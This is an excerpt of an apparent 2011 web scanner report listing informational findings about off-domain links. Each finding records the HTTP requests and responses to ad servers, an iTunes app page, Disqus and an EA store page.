</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='160' height='600' src='http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVktTWGcwTFhsb05URTRNV0pVYVdFNFZURnhTMXBOL05HUmtNRGRpWXpndFpUazNZaTB4TVRoakxUTmtaV010TjJJNFl6VmpNekEyTlRNdy8yOTQxOTM1NzUzNjQwODkyNDgvMTA0MTUwLzEwMDQ2OS80LzZ6bWVpNlZOcm13d2NNMlI0MlVTNUtUUG5BQkwzYlAxUm9PanY4Q3M2Wm8v/oTfmV13b6JDq0c9zhh2pn4_HDtM&price=TgSQoAADoMQK7F3BbGIIR9jKDBPMDVDxspfm9w&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6tatoJAETsTBDsG7sQfHkIjjBtzvj_EBzOCrrhiMmoSTEgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi04NzA3NTc0NDkwOTU0OTc0oAHg6pnsA7IBF3d3dy5nYW1lcnNkYWlseW5ld3MuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cuZ2FtZXJzZGFpbHluZXdzLmNvbS9zdG9yeS0yMTUzMy00MC1vZi1JbnRlcm5ldC1Vc2Vycy1QbGF5LUNhc3VhbC1HYW1lcy1TYXlzLVNwaWwuaHRtbJgCxBPAAgTIAtbBjA6oAwHoAzzoAynoA5UJ6AOVCPUDAAAAzIAGk76y28ul8ufeAQ%26num%3D1%26sig%3DAGiWqtxfqg-GsGrrmjrDjBiRBOQHZpYwBg%26client%3Dca-pub-8707574490954974%26adurl%3D'></iframe>
...[SNIP]...
18.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921638309&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=2204023174%2C2204023174&correlator=1308921637930&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=3&dtd=239&xpc=fnPwSS2C0i&p=http%3A//phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:20:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 8908
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<!-- Code auto-generated on Wed Apr 06 15:38:22 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0%2F1%253B%253B%257Esscs%253D%253fhttp://bookwdw.reservations.disney.go.com/ibcwdw/en_US/specialOfferDetails?name=Promo&promotionCode=fy11myw&market=fy11myw&CMP=BAC-WDWFY11Q2YSQ2DomRackRoomTicket0001"><img src="http://s0.2mdn.net/2789372/FY11WDW_DOM_RackRoomTKTSummerPP_69perday_160.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://phuket.com/%26hl%3Den%26client%3Dca-pub-4422256122899399%26adU%3Dbookwdw.reservations.disney.go.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFKsHkkrvDYbuaqusRS_UGLF-SOIg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
18.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1275313358&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2Fnightlife%2Ffantasea.htm%3Fpid%3DAWDINP1356&dt=1308921756622&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921756643&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1662445191&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket-travel.com%2F&fu=0&ifi=1&dtd=31&xpc=jY7dbuXckF&p=http%3A//www.phuket-travel.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:22:36 GMT
Server: cafe
Cache-Control: private
Content-Length: 2177
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><a target="_blank" href="http://adclick.g.doubleclick.net/aclk?sa=l&ai=B_Sgsm48ETrD0NYaAlgf8v7F6x5PElwLvopCHJcCNt
...[SNIP]...
-120/600%3B42361883/42379670/1%3B%3B%7Esscs%3D%3fhttp://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky"><img src="http://s0.2mdn.net/viewad/2010860/Q211_Acq_DR_EU_Extraordinary_BN_g_120x600_CEL.gif.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.phuket-travel.com/nightlife/fantasea.htm%253Fpid%253DAWDINP1356%26hl%3Den%26client%3Dca-pub-4422256122899399%26adU%3Dcelebritycruises.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHOojZniIuZOaVhD9pmO-WddAm9Ow" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
18.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637638&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=2204023174&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=2&dtd=486&xpc=UVS97xEtP8&p=http%3A//phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:20:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 4054
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="468" HEIGHT="60"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CILk0On1wcWCeBDUAxg8MgiXqD-2mMXCpw">
...[SNIP]...
yCOgDzSfoA_sH9QMAAADE%26num%3D1%26sig%3DAGiWqtyfxYJF2EgTC9l3_jY-G0XM6VYuAQ%26client%3Dca-pub-4422256122899399%26adurl%3Dhttp://adready.com/campaign_event/click/12432891%253Fh%253Dac339538bdc86ecfe11d"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CILk0On1wcWCeBDUAxg8MgiXqD-2mMXCpw" id="google_flash_embed" WIDTH="468" HEIGHT="60" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBC2pJ48ETr6JD839lQeqgZX0CPaj-rkCxtTK5i3AjbcB4OslEAEYASDBy9EeOABQsaXv6gNgydbyhsij_BqgAZqnh80DsgEKcGh1a2V0LmNvbboBCTQ2OHg2MF9hc8gBBNoBEmh0dHA6Ly9waHVrZXQuY29tL-ABArgCGMgCloDAIKgDAegDswHoA_Ip6AOyCOgDzSfoA_sH9QMAAADE%26num%3D1%26sig%3DAGiWqtyfxYJF2EgTC9l3_jY-G0XM6VYuAQ%26client%3Dca-pub-4422256122899399%26adurl%3Dhttp://adready.com/campaign_event/click/12432891%253Fh%253Dac339538bdc86ecfe11d" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://phuket.com/%26hl%3Den%26client%3Dca-pub-4422256122899399%26adU%3Dwww.qatarairways.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEfjGL4wKZLaqM3blKHNjsJtJH5NQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
18.24. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/exxon-mobil-fuel-finder/id397136849

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/app/exxon-mobil-fuel-finder/id397136849?mt=8 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
Referer: http://www.exxonmobilstations.com/mobileapps.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 13:32:34 GMT
x-apple-orig-url-path: /us/app/exxon-mobil-fuel-finder/id397136849?mt=8
x-apple-application-site: ST11
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Fri Jun 24 06:32:34 PDT 2011, Expires Fri Jun 24 06:33:34 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?mt=8&id=397136849&cc=us
x-apple-application-instance: 2096001
Content-Type: text/html
x-webobjects-loadaverage: 0
Content-Length: 33296
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Fri, 24 Jun 2011 13:32:34 GMT
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/62BB/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/62BB/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8">
...[SNIP]...
</script>


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/62BB/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/62BB/web-storefront-preview.jsz"></script>
...[SNIP]...
<h2><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png" alt="iTunes" height="32" width="263"></h2>
...[SNIP]...
</a><a rel="nofollow" target="_blank" href="http://iphone.exxonmobillocator.com/contact.php" class="see-all">Exxon Mobil Fuel Finder Support</a>
...[SNIP]...
<div class="lockup"><img src="http://a3.mzstatic.com/us/r1000/000/Purple/c3/62/c6/mzl.ccowykjt.320x480-75.jpg" alt="iPhone Screenshot 1" class="portrait" /></div><div class="lockup"><img src="http://a3.mzstatic.com/us/r1000/048/Purple/f2/57/74/mzl.sdpuoozs.320x480-75.jpg" alt="iPhone Screenshot 2" class="portrait" /></div><div class="lockup"><img src="http://a4.mzstatic.com/us/r1000/059/Purple/63/3a/86/mzl.uvwgqtdf.320x480-75.jpg" alt="iPhone Screenshot 3" class="portrait" /></div><div class="lockup"><img src="http://a1.mzstatic.com/us/r1000/009/Purple/d3/ec/3d/mzl.rltcqzcj.320x480-75.jpg" alt="iPhone Screenshot 4" class="portrait" /></div><div class="lockup"><img src="http://a2.mzstatic.com/us/r1000/033/Purple/43/18/02/mzl.wkxgoycd.320x480-75.jpg" alt="iPhone Screenshot 5" class="portrait" /></div>
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/016/Purple/24/fc/92/mzi.zdawwbgm.100x100-75.jpg" width="100" alt="Route3D Grand Canyon Lite" height="100" class="artwork" /><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/015/Purple/be/1d/c9/mzi.lfdjrack.100x100-75.jpg" width="100" alt="Park Me" height="100" class="artwork" /><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a3.mzstatic.com/us/r1000/093/Purple/bc/a4/bd/mzl.xmqhzahx.100x100-75.jpg" width="100" alt="Compus" height="100" class="artwork" /><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/036/Purple/a1/bf/bf/mzl.wblmilse.100x100-75.jpg" width="100" alt="Asia and Russia - Offline map with directU - (free)" height="100" class="artwork" /><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a5.mzstatic.com/us/r1000/035/Purple/b9/0d/27/mzl.cbnmutqx.100x100-75.jpg" width="100" alt="Gottahava Wawa" height="100" class="artwork" /><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a4.mzstatic.com/us/r1000/040/Purple/78/30/27/mzi.ftlahnip.175x175-75.jpg" width="175" alt="Exxon Mobil Fuel Finder" height="175" class="artwork" /><span class="mask">
...[SNIP]...
<div class="fbfan">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=100484820802&amp;width=230&amp;connections=0&amp;stream=false&amp;header=false&amp;height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:63px;" allowTransparency="true"></iframe>
   </div>
   <div class="fbfan last">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=286893159420&amp;width=250&amp;connections=0&amp;stream=false&amp;header=false&amp;height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:63px;" allowTransparency="true"></iframe>
...[SNIP]...
18.25. http://mediacdn.disqus.com/1308858010/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /1308858010/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:46:19 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 170839
X-Varnish: 883333181
Cache-Control: max-age=2529509
Expires: Sat, 23 Jul 2011 20:05:22 GMT
Date: Fri, 24 Jun 2011 13:26:53 GMT
Connection: close

DISQUS.dtpl=function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getGuestFields:function(a){function b(c){return DISQUS.nodes.get("#"+c+(a?"-"+a:""))}return{name:b("dsq-field-nam
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...
18.26. http://mg.dt00.net/js/g/a/gamersdailynews.com.2930.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mg.dt00.net
Path:   /js/g/a/gamersdailynews.com.2930.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js/g/a/gamersdailynews.com.2930.js?t=1115 HTTP/1.1
Host: mg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 24 Jun 2011 13:31:17 GMT
Content-Type: application/x-javascript
Content-Length: 4118
Last-Modified: Mon, 31 Jan 2011 13:45:24 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Sun, 24 Jul 2011 13:31:17 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.7*/ function MGD012930(MGD02){ if (!document.cookie){ document.cookie="MG_2930=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 1
...[SNIP]...
<td width="25%" valign="top" align="center"> <a target="_blank" href="http://www.mgid.com/pnews/'+id+'/i/2930/pp/'+MGD00+'/'+MGDZ2930+'/" ><IMG width="120" height="120" width="120" height="120" src="http://imgn.dt07.net/'+Math.floor(id/1000)+'/'+id+'_b'+ext+'" /></a> <div id="tizer1" style="padding-top:1px;"> <a target="_blank" class="mctitlegh2930" href="http://www.mgid.com/pnews/'+id+'/i/2930/pp/'+MGD00+'/'+MGDZ2930+'/">'+title+'</a>
...[SNIP]...
18.27. http://store.origin.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116274717585,0)
Date: Fri, 24 Jun 2011 14:36:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926169147:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/esi?SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=meta.html"-->
<link type="text/css" rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/games/ea-com_all_v2-9.css" />
<!--[if IE 7]>
...[SNIP]...
<![endif]-->
<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<meta name="google-site-verification" content="CBfSIthiQRhv5lYo6sCn30bvIcodSEX0WTtWfW3jfZE" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePa
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<span><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71081_97x57_1.jpg" /></span>
...[SNIP]...
<span><img src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71072_97x57_e3.jpg" /></span>
...[SNIP]...
<span><img src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71067_97x57_Play4Free.jpg" /></span>
...[SNIP]...
